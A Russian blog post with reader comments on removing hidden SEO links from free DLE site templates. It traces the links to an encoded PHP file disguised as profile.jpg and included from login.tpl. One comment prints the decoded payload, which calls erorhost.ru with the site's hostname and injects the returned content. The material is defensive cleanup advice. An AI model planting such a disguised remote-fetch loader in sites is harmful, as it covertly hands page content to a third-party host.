Удаляем спрятанные ссылки в шаблонах DLE

Многие из нас используют бесплатные шаблоны и даже не подозревают, о том, что там находятся скрытые ссылки. Так как визуально их определить практически не возможно.

А если вы ещё и авторизовались на сайте, то Вам вообще этих ссылок не будет видно.

Уже всем давно понятно, что чем меньше исходящих ссылок идет с вашего сайта тем лучше. Для той же sape и конечно же веса страницы в плане SEO, а не кб. =)

Способ №1 / Легкий

Конечно все ещё встречаются ссылки в шаблонах которые ставят на точки и их легко найти в исходниках.

Пример:

[url=http://vasilenko.info].[/url]

Так же наглядный пример как это будет смотреться в самом шаблоне:

Написал:  Alex V, 27 мая 2010 | Мнений 21| Просмотров: 728

*обратите внимание на запятую (,) после ника Alex V.

Такую ссылочку можно легко удалить в файле shortstory.tpl, но мы сейчас будем обсуждать более сложные методы.

Способ №2 / Сложный

Именно об этом способе я и хотел поговорить в этом посте. Он мне чем-то напоминает аналогичный способ в WordPresse, но только как мне кажется более запутанный для простых пользователей.

Если сказать честно, то вчера я примерно 4 часа искал как убрать с шаблона этот ЗЛОБНЫЙ код, в котором стояло сразу 4 ссылки. Бррр... (это не реклама колы)

Ссылки стоят по такому типу:

[url=http://vasilenko.info][/url]

*обратите внимание! URL без анкора, точек и без запятых. Думаю понятно, что такие ссылки используются для накручивания PR и Тиц.

Я бы и ничего не заметил, если бы не стал исправлять и редактировать шаблон, чтобы он был уникальным. Обычно я сижу и работаю в Google Chrome, но вчера, по нужным мне причинам залез в браузер FireFox.

И смотрел через него исходный код сайта и тут увидел такое...

*Картинка кликабельна! Нажмите чтобы просмотреть её полностью!

Сначала подумал, что у меня FireFox заражен или это просто какой-то баг. Так как в Chrome такого кода и близко не было.

Но, стоило мне на сайте выйти со своего аккаунта и я увидел там такой же код.

Я перерыл все файлы шаблона, все стили, одним словом все файлы, но ничего так и не нашел. Была только одна зацепка, это файл Login.tpl, так как перед левыми ссылками, стоит слово РЕГИСТРАЦИЯ (см. выше на скрине)

Но, там не было левых ссылок =(



Я уже очень долго работаю с движком DLE и у меня есть сайты на инклудах, так как в PHP я ничего не понимаю. Но, в инклудах разбираюсь уже очень давно. По этому я и обратил внимание на вот эту строчку:

Лишний код в DLE

Первое на что я обратил внимание это на слово INCLUDE, значит что-то он прикрепляет к файлу login.tpl.

Второе, это "$login_p=" я понятия не имею за что он отвечает. Но вроде бы раньше я его никогда не видел в шаблоне логина.

И третье, это ссылка на картинку profile.jpg. Которой и близко не было в самой панели авторизации.

С этого уже можно делать какие-то выводы.

Я поставил черточку в файле profile_.jpg, на скрине я её отметил темно-розовым цветом. И о ЧУДО! Этот ужасный код пропал!

Теперь осталось обратить внимание, на саму эту картину:

Я зашел в папку с шаблоном, а далее в папку /images/ и понятно же увидел эту картинку profile.jpg.

И сразу обратил внимание на то, что у неё нед предпросмотра как у других картинок на этом скрине.

Странно не правда ли?

Я решил открыть этот файл с помощью блокнота (у меня стоит NotePAD 2, советую использовать его):

И о чудо! Я увидел там PHP код...

Не знаю как это все работает, но это меня сильно удивило. Код как я понял чем-то закодированный, по этому, что он скрывает сказать не могу.

Я конечно же удалил эту картинку и решил вернуться к файлу login.tpl:

И удалил лишний код, я его тоже отметил на скрине.

Вот собственно и все! Будьте внимательны и сразу смотрите на картинки =) Таких шаблонов с лишними ссылками очень много!

В помощь вебмастеру:

Любую исходящую ссылку можно найти с помощью онлайн сервиса, по поиску исходящих/внешних  ссылок. Например тут http://pr-cy.ru/link_extractor?url=vasilenko.info

На этой неделе ждите:

Постараюсь ещё написать пост, о том как убрать спрятанные ссылки в шаблонах WordPress и не нарушить сам дизайн. UPD 26.07.2010.

Пост о нужных плагинах для WP напишу немного позже

Спасибо Всем за внимание! И спасибо за то, что с нами!



  • Степан

    Вот что оно прячет там:
    “”

  • Степан

    $sock = @fsockopen(“www.erorhost.ru”, 80, $errstr, $errno, 30);
    if ($sock){
    $headers = “GET /sait/id2.php?site=”.$_SERVER[‘HTTP_HOST’].” HTTP/1.1\n”;
    $headers .= “Host: http://www.erorhost.ru\n”;
    $headers .= “Accept: text/html, text/plain, text/sgml, */*;q=0.01 Accept-Encoding: gzip, compress Accept-Language: ru,en Accept-Charset: windows-1251, iso-8859-1;q=0.01, us-ascii;q=0.01\n\n”;

    fwrite($sock, $headers);
    $x10 = false;

    while (!feof($sock)) {
    $x11=fgets($sock,128);
    if ($x10)
    $result .= $x11;
    else
    $x13 .= $x11;

    if ($x11 == “\r\n” )
    $x10 = true;
    }
    fclose($sock);
    }
    else return $error;
    if (strstr($x13,’404′)) return $error;
    else return $result;
    аааа…не пропускает вп пхп код(

  • http://bizlife.us Alex V (СаНьКа)

    Степан, а от куда сами ссылки берутся?

    И за что этот код вообще отвечает?

  • http://bizlife.us Alex V (СаНьКа)

    Спасибо, за то, что расшифровали код.

  • Pingback: Аноним()

  • http://bezvirusoff.ru/ Pa-v-el

    Я уже весь сайт “перерыл” не могу найти одну внешнюю ссылку, что делать?

  • Денис

    Я нашел в фале: …/engine/modules/show.short.php
    Строка № 329
    Искал с помощью “Notepad++” – Задал поиск ссылки в папке с DLE

  • http://bizlife.us Alex V (СаНьКа)

    Денис у Вас наверно Null версия движка, когда сайты нулят, часто ставят свои ссылочки.

    Например нулл от Mid-Team прячет ссылки по-моему в файле topnews.php.

    Я сейчас вообще советую искать ссылки через браузер FireFox и аддон .RDS BAR. Подробнее тут можно почитать http://vasilenko.info/2010/08/25/dopolneniya-firefox/

  • Денис

    Alex V (СаНьКа), да так и есть… Спасибо за ссылку!

  • Сергей

    Большое спасибо за этот материал – очень помог, а то я уже и не знал что делать с грёбанной скрытой ссылкой

  • http://zhilistar.ru Галина

    Да, практически все шаблоны “не от автора” содержат лишние ссылки. Ещё бывает, что при обновлении плагина или виджета также появляются эти самые ссылки.

  • Алёна

    Подскажите, пожалуйста, как обнаружить однопиксельные гиперссылки, кроме предварительного просмотра в почтовом клиенте? Имеется в виду в комментариях (старые).

  • http://bizlife.us Alex V (СаНьКа)

    Алена зайдите в админ панели по этой ссылке “http://ВАШСАЙТ.ru/admin.php?mod=comments&action=edit”

  • Chevinkton

    Здравствуй Alex! не могу найти скрытую ссылку в шаблоне на DLE, просматривая исходный код через браузер я ее нашел вставляется в начале поста между заголовком и статьей отображается как пустое место но в каком файле искать просмотрел все файлы но что то не нашел, может переменная?

  • Chevinkton

    Наткнулся тоже на невидимую ссылку в шаблоне но не знаю где искать ее=( в исходном коде она стоит между заголовком и постом не подскажешь в каком файле ее искать буду очень благодарен!

  • http://bizlife.us Alex V (СаНьКа)

    @Chevinkton, ищите в файле fullstory.tpl или shortstory.tpl.

  • alex

    Спасибо за идею

  • http://multikland.net Денис

    Спасибо, выручил! Целый день бился над этой проблемой!